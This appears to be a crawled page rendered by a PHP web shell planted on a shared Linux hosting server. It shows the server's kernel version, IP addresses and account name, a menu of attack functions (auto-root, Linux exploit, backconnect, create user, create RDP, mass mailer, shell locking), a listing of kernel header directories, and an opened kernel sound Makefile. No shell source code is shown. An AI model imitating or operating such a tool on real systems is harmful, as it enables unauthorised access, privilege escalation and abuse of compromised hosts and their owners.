Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-hwe-6.8-headers-6.8.0-50 /
sound /
[ HOME SHELL ]
Name
Size
Permission
Action
ac97
[ DIR ]
drwxr-xr-x
aoa
[ DIR ]
drwxr-xr-x
arm
[ DIR ]
drwxr-xr-x
atmel
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
drivers
[ DIR ]
drwxr-xr-x
firewire
[ DIR ]
drwxr-xr-x
hda
[ DIR ]
drwxr-xr-x
i2c
[ DIR ]
drwxr-xr-x
isa
[ DIR ]
drwxr-xr-x
mips
[ DIR ]
drwxr-xr-x
oss
[ DIR ]
drwxr-xr-x
parisc
[ DIR ]
drwxr-xr-x
pci
[ DIR ]
drwxr-xr-x
pcmcia
[ DIR ]
drwxr-xr-x
ppc
[ DIR ]
drwxr-xr-x
sh
[ DIR ]
drwxr-xr-x
soc
[ DIR ]
drwxr-xr-x
sparc
[ DIR ]
drwxr-xr-x
spi
[ DIR ]
drwxr-xr-x
synth
[ DIR ]
drwxr-xr-x
usb
[ DIR ]
drwxr-xr-x
virtio
[ DIR ]
drwxr-xr-x
x86
[ DIR ]
drwxr-xr-x
xen
[ DIR ]
drwxr-xr-x
Kconfig
2.73
KB
-rw-r--r--
Makefile
565
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# SPDX-License-Identifier: GPL-2.0 # Makefile for the Linux sound card driver # obj-$(CONFIG_SOUND) += soundcore.o obj-$(CONFIG_DMASOUND) += oss/dmasound/ obj-$(CONFIG_SND) += core/ i2c/ drivers/ isa/ pci/ ppc/ arm/ sh/ synth/ usb/ \ firewire/ sparc/ spi/ parisc/ pcmcia/ mips/ soc/ atmel/ hda/ x86/ xen/ \ virtio/ obj-$(CONFIG_SND_AOA) += aoa/ # This one must be compilable even if sound is configured out obj-$(CONFIG_AC97_BUS) += ac97_bus.o obj-$(CONFIG_AC97_BUS_NEW) += ac97/ ifeq ($(CONFIG_SND),y) obj-y += last.o endif soundcore-objs := sound_core.o
Close